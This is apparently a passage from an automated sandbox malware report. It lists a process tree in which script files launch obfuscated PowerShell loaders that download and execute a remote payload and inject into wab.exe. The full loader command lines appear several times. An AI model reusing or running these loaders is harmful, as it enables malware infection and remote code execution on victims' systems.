"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"
11⤵
PID:5948

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4964

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dqwfkg.vbe"
9⤵
- Checks computer location settings
PID:5624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Perennate = 1;$Skvatmiklernes='Sub';$Skvatmiklernes+='strin';$Skvatmiklernes+='g';Function Brandstiftelsers($staalwirer){$Stivedes49=$staalwirer.Length-$Perennate;For($Maltet=5;$Maltet -lt $Stivedes49;$Maltet+=6){$Vizor137+=$staalwirer.$Skvatmiklernes.Invoke( $Maltet, $Perennate);}$Vizor137;}function Hjemvisendes($Vasili){& ($Dispersonalise) ($Vasili);}$pseudoasymmetric=Brandstiftelsers ' UdpiMAmbitoSoleazStrepiPtyall ataplPlyboaNonbl/.atti5hjdep.Absal0Sprut Hills(CoincW FuksiTopoanTabled A,unoA.trawCh,uvsFelt. ordeNEl kvT Amag Retab1Diver0Boyko.Helio0Passe;Refer mad,pW yhediQueernDejk 6Som,e4Konk ;Flint Loopex Noni6milie4Aulae;Alts. AmmunrSc,riv Lath:Ditte1zy ne2tr mn1Lampm.Ra io0Rate.)Sving ConjuGG,oteeObtencMedarkA.diloHalvk/Aup k2K mfu0Fugti1Frugo0Incol0tyres1 Gran0Oppos1Reali Fa kyFMalfeiSe.onrJu ole efugf uumoDownyx Me.r/Moleh1 ,agi2Hepat1Bahan..valt0Na.io ';$Cordwood=Brandstiftelsers 'To.teUBlgelsOverweSkol ranalo-Pre,oARiddegCripseMo oanRedigtAffek ';$Efterregningerne=Brandstiftelsers ' RegehPlanftV,lgbtSynkrpPre tsIn el:A.tog/Ident/OvergjFareso Co,hcCountcFah euside.pHotroaprodut OveriMa.choOverrnKo.keaVr,tjlOvercs.inercVerediEf ereNereinHftelcKvindeBilip.InkmaoSubsir Ud,rgLongb/Underzy dliaadre.r Tek aPjalt/PteryB E.curSerpeaRemani UnconRe rosScandtUn opo F,llr VitimCol,miApostnTumorgArtebeVermir,imbo.TottesAppromPuppyiafgiv ';$Gyroceras=Brandstiftelsers 'Naad >Slvbr ';$Dispersonalise=Brandstiftelsers 'ForeliFamiletrajexBorte ';$Blackbine28='Clamminesses';$Bedazzlingly = Brandstiftelsers 'All.gearth.cSic lhIn,raoA,non Epikk%Rundba IntepSlavepTilstd.dskraSpermtRe tra nona%Tresi\Calo.F Ude r Iljie TrandKentrsTakstaKof,ef Ho,ot VildaPalmalK.itie D,esrazule. O gaHInspioAntiflKapel majes&Hepar&Iwear Tet,neRuskuc Lokah UdfooFulmi Ju,ot Bon, ';Hjemvisendes (Brandstiftelsers 'Hagli$afsidgAntiplnonreo nemob Did,aEfterlUfore:EnmesSTilliy CollnOver aSupersSti.tcTin ei omidL.quei Rak.aEnspneDesul= .ilt(DuftecUnfi,mbomb dsid,l Bruge/ xcecGr di D,bbi$Hva.fB ,alleJekasd UnstaTurnpz alizHu.enlTidsviAntisnUnvo gPhagolCabbay Omad).utfo ');Hjemvisendes (Brandstiftelsers ' .atn$Obst gSejlglSoo,loAnskubKraneaLenielArres:RampoBTheirrOvermeFo.frvLkus.oI.trorGenerd Mordn Diske Hjl.rTilbenTrapmeForkosStorj= Ea i$SuperEPrizefhomeotVasaeeFllesr BorarB ptieStnkeg anfonmetaliAbonnnVvstygSemideGrun rStellnExcore opim..ntersOpsigp Eparl ,ubsiRespitDiagn(Va.co$BortfG eculy FormrOp.rao ZoomcId,toeOmbrorB.speado,insKomp.)Condo ');$Efterregningerne=$Brevordnernes[0];$Audubon= (Brandstiftelsers 'N,nep$ ChargGymn.l ubcooTastebIsmebaUnpralCa,ou:TopnoUGoldwdBlomsvLn,delOverzgDishtnFeeliiBitrynTtningUnalls.amme= VagtNCompletovaswPrede- Und,OhuldsbDioxijPremee ShipcIsobitDeobs EtapeSB igayBr,sls ,lletYnksoeLatenmrenum. KamaNLb,nseSakertOvere.LengtW.pspreJordebB ebrCambiglMala.iBoan.eTabtanIntert');$Audubon+=$Synascidiae[1];Hjemvisendes ($Audubon);Hjemvisendes (Brandstiftelsers 'Recep$BethiU ArredKonsuvToaarlPros.gNdtvunLeiseiwit.dnAlenegPrefesGonad.DkninHIn.erehelseaOmmesdMattee,ogstr Prersstrif[Rout.$Dis.oCUnderoT,wnirUformd Ordfw,orkroVarmeoRobotdK,nfi]Bligh=Prowl$Mastupst.ycsAssaieOptimuAdoledForbioC.bicaAdgansIn.alySkrunm .chimUg,bleRuedetK.imar,nnedi Qua.c Iber ');$Totting=Brandstiftelsers 'Anst $decohUfinerdEudaevAn imlme.legD.tomnCuculiPicron Bu,ng UndesMinis.senatDSapono KultwArbejn AkkrlSon,so ArneaEskapd LagoFTrafii MeatlNephreHemip(Anbe.$ParisESne efVouchtcockne rou r Kapsr PrineTek tg lyvn QuiniSheennRhodogUbalaeVakuurStamknM sereCu ti,unexc$DisperLugerebaculb Bev.omonotp.erves evrt)Gedem ';$rebops=$Synascidiae[0];Hjemvisendes (Brandstiftelsers 'Surds$ExistgCabaslSpinooAmie bSanera VisilT.lme:NonloUAdaminM.ximr,ikameS.lutpNulteuSproglU dglsCyliniStykvn Gr ugPseud=Depen(FlyveTBondee,redsspagajt,zonl-GreybPMeetiaIntimtOmrinhH.ste Nonav$V kelr tyrae.iplib InstoInvespSpaansIsosp)Morbr ');while (!$Unrepulsing) {Hjemvisendes (Brandstiftelsers 'Sp tk$ Taleg Chi,lE.kimoSa,ebb He,ra Edd l Trew:OplanCChe.koFiskeuAmatrn F.emtBilleeR.klirTotalpEngolrChe.roSpr.egHisparKeramaListemSka.tmOutstiopfinn Bangg api=Paddl$UdsprtGimper HydruN.taaeWalla ') ;Hjemvisendes $Totting;Hjemvisendes (Brandstiftelsers 'CreasSTestkt DermaCasser Hidst Alde-Intr,S Sal lCou.teLuaneeAar,gpRelat Fitif4Whack ');Hjemvisendes (Brandstiftelsers 'Dyren$Impi,g HortlForeboBa,kbbSharpaUnde.l moti:Apho Ukikkenkon.orSerrae LopopTapiouStiftl CompsoverfivelsennonplgFlers=No po(RkkeuTSwardeBarbas N nct,elco- .orbPGenstaSem.etTuberhSprjt Tids.$ObverrSkumgeTyronbBushio MercpV.brasN.nsh)Sk.be ') ;Hjemvisendes (Brandstiftelsers 'slute$Bel.rgSkotjlInsecoBehalb.erosaNonanl Klav:BorsjFOve,fu Splkn Sy,ddTur ie.umpir,roth2Ne ju1Tilla6Attri=Jepmi$Ud.ybgU,intlPlatio selebGrusnaFa.talUnde,:Jo,geUFyrvrnSpareiMu,timM ngfb.orpuuenbuseUs,ledAttri+ Sjo,+N.dis% Cine$TormeB irkur ,uppeTrumfvMaleeo BondrStemndKa elnTeknieBeskyrFortonmosseeVa gtsB nrf. onodcGalvaoRodenuInstanProd.tSwand ') ;$Efterregningerne=$Brevordnernes[$Funder216];}$Yowed=340534;$Epiteternes=29321;Hjemvisendes (Brandstiftelsers 'Nons $ ChargHo edlMonoso BlvrbSkrapaNedsil Mode: U.thZUnp,riSkovmgApprog unp iDisafePragtsMaxif2hov d1Ssyge3Grand yoyo=Ka.ar ,seudG C.ameNoncot Bing-Of.enCEn.meoCh.fenBris.tStinteswe,pnSe skt Isop N.nre$Doorkr MonoeCalifb K fioFrou.pH.ppos Slu ');Hjemvisendes (Brandstiftelsers 'Ha,ps$ StumgPluralK ediobe.chbVerboaHa vflPseud:Samm,KOplagoSalgsmAna omRecreu gunnnSex geP.rroppecunlHardwaStenvnAlaba Enski= O,er Bron[DespeSBraggyKa.mesruffitFodboe .ndemSma l.StyreCFortoo.aysenRorshvSkytteOversrHaandtShas.]Lycop:Gauch:InitiFUdsperR,nteo CaudmTe.usBVirkeaDefe,sPhycie K ng6 Ana.4Vo.umSSumertA.ularc lipiNitignmarkpgDe.in(S.rik$Fr teZBons,iHa,big K,lkgVotiviSnirkeD.ssisSmer.2 S.ec1Kitni3Ge st),okul ');Hjemvisendes (Brandstiftelsers 'Samme$InclugWi.til NonsoAccurbByggeaTu,anl dent: noncIDecenn HilltIsogriFinanmRomantN.rve Enjoi=Julea Fo,ra[SeguiSH.gtbyOvergsHardwtSdruceMetapmCount.GldetTTilree Dim,xDepigtNapht.SporvENumernFyldpc Rejso Dekrd st ri onnin WaybgOverh]Rek l: Ud.i:GuineABib,iSF.ddlC Go.hISpo eI In,e.k.lofGSkumreMikrotmuci S ModetNonp,rGarroiA.surn Ja.kgRatio(Taalm$ ExacKAfk eoUreelmErhv.mIntimuBacksn UncoeFlyvepD sorlSpulea isnin,abri) Koni ');Hjemvisendes (Brandstiftelsers ' ango$Bef igTurbilSky.toLejrpb.agneaP.edelpr hu:CompaTParoxoImporeSnksmrbekmprRest,eDrabbdUps,oePoint= rubi$NonsiImeni,nGr,sgtVi.nnikompemUdh,ltTyph .mischs Miliu ForbbSym,osLen,et.wistr,agadiOctocnKultugNedst(Doubl$unnecYl,skeoEm,rowIldsjeElecidFuld., Bl d$ udgeEDunnepMemori DeprtchiroeFilsytSamleeQuottrF lkfnSoc ae ,mvisMottl)Au,ik ');Hjemvisendes $Toerrede;"
10⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fredsaftaler.Hol && echo t"
11⤵
PID:5440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Perennate = 1;$Skvatmiklernes='Sub';$Skvatmiklernes+='strin';$Skvatmiklernes+='g';Function Brandstiftelsers($staalwirer){$Stivedes49=$staalwirer.Length-$Perennate;For($Maltet=5;$Maltet -lt $Stivedes49;$Maltet+=6){$Vizor137+=$staalwirer.$Skvatmiklernes.Invoke( $Maltet, $Perennate);}$Vizor137;}function Hjemvisendes($Vasili){& ($Dispersonalise) ($Vasili);}$pseudoasymmetric=Brandstiftelsers ' UdpiMAmbitoSoleazStrepiPtyall ataplPlyboaNonbl/.atti5hjdep.Absal0Sprut Hills(CoincW FuksiTopoanTabled A,unoA.trawCh,uvsFelt. ordeNEl kvT Amag Retab1Diver0Boyko.Helio0Passe;Refer mad,pW yhediQueernDejk 6Som,e4Konk ;Flint Loopex Noni6milie4Aulae;Alts. AmmunrSc,riv Lath:Ditte1zy ne2tr mn1Lampm.Ra io0Rate.)Sving ConjuGG,oteeObtencMedarkA.diloHalvk/Aup k2K mfu0Fugti1Frugo0Incol0tyres1 Gran0Oppos1Reali Fa kyFMalfeiSe.onrJu ole efugf uumoDownyx Me.r/Moleh1 ,agi2Hepat1Bahan..valt0Na.io ';$Cordwood=Brandstiftelsers 'To.teUBlgelsOverweSkol ranalo-Pre,oARiddegCripseMo oanRedigtAffek ';$Efterregningerne=Brandstiftelsers ' RegehPlanftV,lgbtSynkrpPre tsIn el:A.tog/Ident/OvergjFareso Co,hcCountcFah euside.pHotroaprodut OveriMa.choOverrnKo.keaVr,tjlOvercs.inercVerediEf ereNereinHftelcKvindeBilip.InkmaoSubsir Ud,rgLongb/Underzy dliaadre.r Tek aPjalt/PteryB E.curSerpeaRemani UnconRe rosScandtUn opo F,llr VitimCol,miApostnTumorgArtebeVermir,imbo.TottesAppromPuppyiafgiv ';$Gyroceras=Brandstiftelsers 'Naad >Slvbr ';$Dispersonalise=Brandstiftelsers 'ForeliFamiletrajexBorte ';$Blackbine28='Clamminesses';$Bedazzlingly = Brandstiftelsers 'All.gearth.cSic lhIn,raoA,non Epikk%Rundba IntepSlavepTilstd.dskraSpermtRe tra nona%Tresi\Calo.F Ude r Iljie TrandKentrsTakstaKof,ef Ho,ot VildaPalmalK.itie D,esrazule. O gaHInspioAntiflKapel majes&Hepar&Iwear Tet,neRuskuc Lokah UdfooFulmi Ju,ot Bon, ';Hjemvisendes (Brandstiftelsers 'Hagli$afsidgAntiplnonreo nemob Did,aEfterlUfore:EnmesSTilliy CollnOver aSupersSti.tcTin ei omidL.quei Rak.aEnspneDesul= .ilt(DuftecUnfi,mbomb dsid,l Bruge/ xcecGr di D,bbi$Hva.fB ,alleJekasd UnstaTurnpz alizHu.enlTidsviAntisnUnvo gPhagolCabbay Omad).utfo ');Hjemvisendes (Brandstiftelsers ' .atn$Obst gSejlglSoo,loAnskubKraneaLenielArres:RampoBTheirrOvermeFo.frvLkus.oI.trorGenerd Mordn Diske Hjl.rTilbenTrapmeForkosStorj= Ea i$SuperEPrizefhomeotVasaeeFllesr BorarB ptieStnkeg anfonmetaliAbonnnVvstygSemideGrun rStellnExcore opim..ntersOpsigp Eparl ,ubsiRespitDiagn(Va.co$BortfG eculy FormrOp.rao ZoomcId,toeOmbrorB.speado,insKomp.)Condo ');$Efterregningerne=$Brevordnernes[0];$Audubon= (Brandstiftelsers 'N,nep$ ChargGymn.l ubcooTastebIsmebaUnpralCa,ou:TopnoUGoldwdBlomsvLn,delOverzgDishtnFeeliiBitrynTtningUnalls.amme= VagtNCompletovaswPrede- Und,OhuldsbDioxijPremee ShipcIsobitDeobs EtapeSB igayBr,sls ,lletYnksoeLatenmrenum. KamaNLb,nseSakertOvere.LengtW.pspreJordebB ebrCambiglMala.iBoan.eTabtanIntert');$Audubon+=$Synascidiae[1];Hjemvisendes ($Audubon);Hjemvisendes (Brandstiftelsers 'Recep$BethiU ArredKonsuvToaarlPros.gNdtvunLeiseiwit.dnAlenegPrefesGonad.DkninHIn.erehelseaOmmesdMattee,ogstr Prersstrif[Rout.$Dis.oCUnderoT,wnirUformd Ordfw,orkroVarmeoRobotdK,nfi]Bligh=Prowl$Mastupst.ycsAssaieOptimuAdoledForbioC.bicaAdgansIn.alySkrunm .chimUg,bleRuedetK.imar,nnedi Qua.c Iber ');$Totting=Brandstiftelsers 'Anst $decohUfinerdEudaevAn imlme.legD.tomnCuculiPicron Bu,ng UndesMinis.senatDSapono KultwArbejn AkkrlSon,so ArneaEskapd LagoFTrafii MeatlNephreHemip(Anbe.$ParisESne efVouchtcockne rou r Kapsr PrineTek tg lyvn QuiniSheennRhodogUbalaeVakuurStamknM sereCu ti,unexc$DisperLugerebaculb Bev.omonotp.erves evrt)Gedem ';$rebops=$Synascidiae[0];Hjemvisendes (Brandstiftelsers 'Surds$ExistgCabaslSpinooAmie bSanera VisilT.lme:NonloUAdaminM.ximr,ikameS.lutpNulteuSproglU dglsCyliniStykvn Gr ugPseud=Depen(FlyveTBondee,redsspagajt,zonl-GreybPMeetiaIntimtOmrinhH.ste Nonav$V kelr tyrae.iplib InstoInvespSpaansIsosp)Morbr ');while (!$Unrepulsing) {Hjemvisendes (Brandstiftelsers 'Sp tk$ Taleg Chi,lE.kimoSa,ebb He,ra Edd l Trew:OplanCChe.koFiskeuAmatrn F.emtBilleeR.klirTotalpEngolrChe.roSpr.egHisparKeramaListemSka.tmOutstiopfinn Bangg api=Paddl$UdsprtGimper HydruN.taaeWalla ') ;Hjemvisendes $Totting;Hjemvisendes (Brandstiftelsers 'CreasSTestkt DermaCasser Hidst Alde-Intr,S Sal lCou.teLuaneeAar,gpRelat Fitif4Whack ');Hjemvisendes (Brandstiftelsers 'Dyren$Impi,g HortlForeboBa,kbbSharpaUnde.l moti:Apho Ukikkenkon.orSerrae LopopTapiouStiftl CompsoverfivelsennonplgFlers=No po(RkkeuTSwardeBarbas N nct,elco- .orbPGenstaSem.etTuberhSprjt Tids.$ObverrSkumgeTyronbBushio MercpV.brasN.nsh)Sk.be ') ;Hjemvisendes (Brandstiftelsers 'slute$Bel.rgSkotjlInsecoBehalb.erosaNonanl Klav:BorsjFOve,fu Splkn Sy,ddTur ie.umpir,roth2Ne ju1Tilla6Attri=Jepmi$Ud.ybgU,intlPlatio selebGrusnaFa.talUnde,:Jo,geUFyrvrnSpareiMu,timM ngfb.orpuuenbuseUs,ledAttri+ Sjo,+N.dis% Cine$TormeB irkur ,uppeTrumfvMaleeo BondrStemndKa elnTeknieBeskyrFortonmosseeVa gtsB nrf. onodcGalvaoRodenuInstanProd.tSwand ') ;$Efterregningerne=$Brevordnernes[$Funder216];}$Yowed=340534;$Epiteternes=29321;Hjemvisendes (Brandstiftelsers 'Nons $ ChargHo edlMonoso BlvrbSkrapaNedsil Mode: U.thZUnp,riSkovmgApprog unp iDisafePragtsMaxif2hov d1Ssyge3Grand yoyo=Ka.ar ,seudG C.ameNoncot Bing-Of.enCEn.meoCh.fenBris.tStinteswe,pnSe skt Isop N.nre$Doorkr MonoeCalifb K fioFrou.pH.ppos Slu ');Hjemvisendes (Brandstiftelsers 'Ha,ps$ StumgPluralK ediobe.chbVerboaHa vflPseud:Samm,KOplagoSalgsmAna omRecreu gunnnSex geP.rroppecunlHardwaStenvnAlaba Enski= O,er Bron[DespeSBraggyKa.mesruffitFodboe .ndemSma l.StyreCFortoo.aysenRorshvSkytteOversrHaandtShas.]Lycop:Gauch:InitiFUdsperR,nteo CaudmTe.usBVirkeaDefe,sPhycie K ng6 Ana.4Vo.umSSumertA.ularc lipiNitignmarkpgDe.in(S.rik$Fr teZBons,iHa,big K,lkgVotiviSnirkeD.ssisSmer.2 S.ec1Kitni3Ge st),okul ');Hjemvisendes (Brandstiftelsers 'Samme$InclugWi.til NonsoAccurbByggeaTu,anl dent: noncIDecenn HilltIsogriFinanmRomantN.rve Enjoi=Julea Fo,ra[SeguiSH.gtbyOvergsHardwtSdruceMetapmCount.GldetTTilree Dim,xDepigtNapht.SporvENumernFyldpc Rejso Dekrd st ri onnin WaybgOverh]Rek l: Ud.i:GuineABib,iSF.ddlC Go.hISpo eI In,e.k.lofGSkumreMikrotmuci S ModetNonp,rGarroiA.surn Ja.kgRatio(Taalm$ ExacKAfk eoUreelmErhv.mIntimuBacksn UncoeFlyvepD sorlSpulea isnin,abri) Koni ');Hjemvisendes (Brandstiftelsers ' ango$Bef igTurbilSky.toLejrpb.agneaP.edelpr hu:CompaTParoxoImporeSnksmrbekmprRest,eDrabbdUps,oePoint= rubi$NonsiImeni,nGr,sgtVi.nnikompemUdh,ltTyph .mischs Miliu ForbbSym,osLen,et.wistr,agadiOctocnKultugNedst(Doubl$unnecYl,skeoEm,rowIldsjeElecidFuld., Bl d$ udgeEDunnepMemori DeprtchiroeFilsytSamleeQuottrF lkfnSoc ae ,mvisMottl)Au,ik ');Hjemvisendes $Toerrede;"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5976

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fredsaftaler.Hol && echo t"
12⤵
PID:4992

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
12⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6520

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kadkdt.vbs"
9⤵
- Checks computer location settings
PID:6472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Siccimeter = 1;$Wattmetre='Su';$Wattmetre+='bstrin';$Wattmetre+='g';Function Alethoscope71($Drmmeanalysernes){$Corsage=$Drmmeanalysernes.Length-$Siccimeter;For($Falsummer=5;$Falsummer -lt $Corsage;$Falsummer+=6){$Imperalistiske+=$Drmmeanalysernes.$Wattmetre.Invoke( $Falsummer, $Siccimeter);}$Imperalistiske;}function zabra($Overproportion){& ($Myrdedes) ($Overproportion);}$Eneanpartshavernes=Alethoscope71 'FormiM Af.aoNattez,ndusiL.ffalAvan l MascaMoent/Sknhe5 Avol.,lmue0backs Sch.s(M teoW Hamfi Auton Uns,dFl.oro CentwGenins Mon. klunsN PoteTPoste Ca.t1Limbe0 itri.Biobi0Ra,df;lini. BlikvWStu.ei Be.rn illm6 Euf,4Sq.ir;T,der Quifx anti6pro.i4Karkl; Inte PrsumrDetecvFyld.:Cacci1 Stag2 ,iss1O.era.Eutr 0Studi)Pseud ,nklaGAse aeTranqcDipalkThorvo Sikk/Ungua2Ydmy.0Unmon1Eurov0 Sylv0Cirku1.udde0Disse1Unmem For dFInteriredigrKunsteStdvif BegaoGast x Genn/P.lst1Spill2.othe1Grube.,rogl0 samm ';$Disaccharidase=Alethoscope71 'oprusUSupersElenieVrelsrVeinw-Ef,erAVintegjuri,ezeb.anDissttHalvs ';$Gennemblades=Alethoscope71 'ska,th VicetDebatt.aarepFrdses.ager:Oppr,/V.ola/ ysiuwRekrewFlagrw Unin.,emissLivske ForrnServodUndubs OverpDomi,aSkrkkcElecte Dubl.Forf,cC mpeoVankemTra.s/ Fo,kpDyr er.morooSub,e/ BistdFatesl Symp/HavbiaNonopz CatakBogbijMonadmGra,ifDjvle ';$Bedstevenners=Alethoscope71 'Swash> hyro ';$Myrdedes=Alethoscope71 'BedcoiCompreFeminxServa ';$Renteflsomme='Superjudicial175';zabra (Alethoscope71 'FotomSM ifeeEndomtMatfe- OverCPirogoData n Hao,tJuleaeUdmntnClau tTrldo Unnat-,pkalPCa.dia HingtGoddeh Impa IntelTFri r:maelk\NavneR PastuW.relsBefritBl.esi,meltcP,rveaQua.itMarkio DuscrAngor.Br.set StevxIntertvandf Amfi-Ho blV GaleaV,ljel JunguOfftreKarte Ri al$Tra kRAlkaleUf ldnGipsetL ndeeTils,fAtmialO tplsAutomoG,nnemorddemTi,everot t;Ne.ri ');zabra (Alethoscope71 'unpariSwayef Wamu schem(L.ramtWirepeHypsos Sammt,sfor-IcierpToranaOsseotVideohHeadl HiemaTP,ila:Evang\L dskRCircuuSubresBannet StoniTropic,oenta BandtRicksoFolk.rN.hil..eclitC cloxHamalt Cope) Leve{ OrnaeAmortxTar.aiLineatP rri} Pott; R ma ');$Informationsmaengder = Alethoscope71 'JuleseSerpecProtohOutgroFader Serap%Genfra UnivpDarbhp ,amadF rtoaRefortderriaCoact%Phosp\.ronuiAlgols Sym.oFor.ilHerreiMong nSnoreo LefllSpu seOv.rsn Lyg iBekk,c ivsb. TranO Jap vS,rumeOppus Sap n&Pasi,&Under Miljme P.loc HydrhHe.ocoAgter Calin$Sterl ';zabra (Alethoscope71 'Gifte$ Affig,anagl,ubapo.nwrabAmbita CykllKonst:RessoG ranrS.aaruIstann f ysdStepcmF raguSkrumr,nifie Om,ln ypoce,onsts,arie= Bouc(Sr,lac nstimStaklduns,c Bagg/ BouncDeis Samm$JeppeI stornKartefcalcioTil,grArsenmSkiftaSymb tRegnsiAfko ouddran Torbs Cashm p tiaShoddeTimotnKvintgsubduddiamie Hum.rAchiy) Farm ');zabra (Alethoscope71 'H ssa$OutcagovertlUnunaoN,nfob RailaP.litlBifen: NontFStep.oSpectrengrau Afgar.onceeVernanBn,haeWrastnPseuddAf,oleKapu,=Parae$ nalGLeucieStammn,dtalnR ordeBomrkmIn robAntholSlo pa.ulindHi.dreHumansFirs,.Rekurs NongpGun ylCongriStrejtElect(Mumps$EfterBst tieTupi,dNedt sWestmt .vere My ev RecoeKniv,n ElsknRectoeDragorVirkesSlimp)D.flj ');$Gennemblades=$Forurenende[0];zabra (Alethoscope71 'B.rts$MacbegNonfulMultioNy.rubGurura .umplTo ga:MasteZ .ncui NonhsSkrvik Ve.iaStvne=JakfrNPareneGrundwBlomk-DroluOtelttbBeastjLignieK adrcVariatUnpop K ubSWreakyNon.as.unnetWereceFl gemK.ind. Vi eNInconeUncontUnshr. Hi,cWVrange plusb M.skCPrieslBick iClubbeOluffn prertRhode ');zabra (Alethoscope71 'Akva $In.viZWithbiThatcs ColikDiffea Tita.Lum,iH uffye pe,sa pild Bib eProtorWholesUimod[Li us$SocioD AsieiFacilsLicheaJ ssicSpyttc SemihKom aacogwar Spili .ensd MollaHumilsSyndeeEkste] Nonl=odont$kompoEIsoninTagale,meriaLacemnRefunp,lectaNoncorM llotLigemsSkntrhBogklaJalouvFooteeAlterrForstnSikkeeDitzssV,lla ');$Bronchitic=Alethoscope71 ' GrovZBlackiStoolsHe stkAffa.aTheat. grnsDExspooForhawAilannCoupllV teroBiporaScorid,tomaFUnridiproc.lp osleChris( Bout$ rillGSkammeAutornSalignDiscoeBjergmgrandb fo,tlModviaAfkoldmyth eAnfrbsAudie,Gipsb$IntonSDickipTeariaM trotBootpcAfmyth M.ttc Skrio W aicA,bifkblitz5 Serv9F.urn)Laser ';$Bronchitic=$Grundmurenes[1]+$Bronchitic;$Spatchcock59=$Grundmurenes[0];zabra (Alethoscope71 'Rots.$Helbrg Alsil Ove,o highbSkovlaPneumlFleur:JurisIWallsn,entes OpkaeSk,bmcGasrat St miBlybacPederiSynkrdambl,e Naba=Unbod(Bill,Tflosse.nucksNormatS ffi- fortPMisusa I.ddt NedshLovre Cryp$RaciaSHjemmpRenalaGenn.tTildicNetvrh.ragtcUngluoF.rfucValgfkO erp5K pec9,onde)troll ');while (!$Insecticide) {zabra (Alethoscope71 'Natti$HowbegDrainlAntifo A trbErranaMudlal ogu:SemipDCumuleOriensCobe.a DatavJenskoRealkuDundeevinkorForsaiFedernUrceogPigede .midrBek e=Pancr$ Tr,mtAfm trBo.bouAdulte aver ') ;zabra $Bronchitic;zabra (Alethoscope71 'BarriSGenictKlokkaKonger.ndskt Cann- SkydSPar,ilP kleeendetePyn epbebyr Inval4,even ');zabra (Alethoscope71 ' Sigj$GarangMinimlDe onoTnkelb SheoaClunilKarnf:redisIHeartnSl ntsNedskeUncencSign.tArmodiFagkycChalciCeratdSol ee Out =Efter( agneTe traedokumsslurrthenty-Clot,PSixmoa SenotguayahMind. Waggo$U.ennSSamm.pAfs,aaBeln tPoticcSiderhTenorc Jv,doF rehc DebikUnali5Elysi9 Cut )urost ') ;zabra (Alethoscope71 ' Re.r$Indbyg FordlPlejeoStra bSubpaaAutoml Kloe: Da.sT udseiUdty lBlackoBekymrDis rd Zinkn Cry,e sej r,yrre=Ortho$ Ch,sgPejlelReso,oL irsbrekuraIchthl Epim: JellB LittaCrabbrElgt,sCalloeRkenvlVesicsA.vorf EgeteDeklibFreckePa.opr lomeAntidnKa nfsAppri+Mispr+Markh%Tekst$KaadmFRicheoChaenr Mod.uLimonrLovf,epasfonBetraeMicr.nYdelsdSupereNipsg.SprawcWau hoUn.esuPtpconAfladtVisar ') ;$Gennemblades=$Forurenende[$Tilordner];}$Skandinaviensrejses=322661;$Thirlages=28492;zabra (Alethoscope71 'Suf l$Br.dygVe nulvagtsolysebb enoaIndstl nons:FagspB Lig l a,atl LerseSaledh AwheaHa,ket SelftSpagne ejrsnTeksteVa,visOntic1Afdel1Spoon2,pith Adjus=k.nce ForstG AfhoePers,tSvir.-B.edeCKarakoVortin KulttNow,seGi.nenFritntKlode Ident$Ta,waS.utodpPasseaHy letC,chlcHorolhtossecSalitoS.ckecOncogkJoz.t5Filla9 Skue ');zabra (Alethoscope71 ' gal $ThumbgFremslPurrioDeallbA.ayraB.fiplTersh:RadioDLa,ahiNon.ra,ndgigCeleboNorm,nU fsliPickwa.nthrlDrnud cutic=Prekr s,il[J rypSAfklay Tur,s krumtE.peceStendmFer,i.TelefC .freoKonson DodevTeglveReassrScaputCeleb]cit,u:Servo:MissiFRetorrTota,oDesmomkanflBDeriva Exp.sEudioePtole6S lia4 MokkS PlastUsa,drSelskiVandrn TuyegA,chc(Short$KlageB EnkelEjendl Fa teUn.lah LifeaasmintLitzytT asseClearnSto.deSamfusOxidi1 Sasa1Ho,er2Sa,ro)iodin ');zabra (Alethoscope71 ' .pid$AutorgOcea.lAk.ioo vintbT,deraBeb,tl rahm:SprinN IndeaBadehtI,plauPrebrr Kvi,fBefalr Han.e BrnddSimrenFi,mkiKraten iligg Br dsFoste Kab n=Recep fre m[fasefSFlintynit,nsEvangt Forse RevymBytte.GastrTPositeP.lerx D,ejtBests.LaminEFremsn Unm,cSe,teoFeme.dTypoliOuttrnTordig Vach]Outwa:Skovl:EnsluAI,serSSuperCReassIAlsidIiskol.flereGGalvae Sh,utImmunSP,iretStjdmrSlagtiC ntanOpiumgJann,( Bell$ DeriD SuttiI.conaJuntagS.ovsov rianPre ci befsaOutkilUnree)Tcha, ');zabra (Alethoscope71 'Inven$B.elagTempelrussioPhacobUntemaSelvblGlory:HardbSBowshc ForsuChemitRemuluA,kohl Seksaranie=Disas$SemipNRepada Mar.tBibelu F rmr ThyrfBritir.rimreIs.eldUgyldnAn.rkiKer tn Unimg.etodsFdeva. SporsDazaeuPha ib C.thsToxaet M elrNonriiLaesenxylopg.efec( Rigs$ AgreSEjerskBefola Tes.nRundkd LisciSur,enFordjaInterv tilii Spile EksanA ades Ku,trSti,ce,edbrjEcurisDdsn.e TransUnder,Borde$Jami,T kapihSaloniKowtor dew,lEquivaSulevg quire S.avs Deci)primf ');zabra $Scutula;"
10⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"
11⤵
PID:5628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
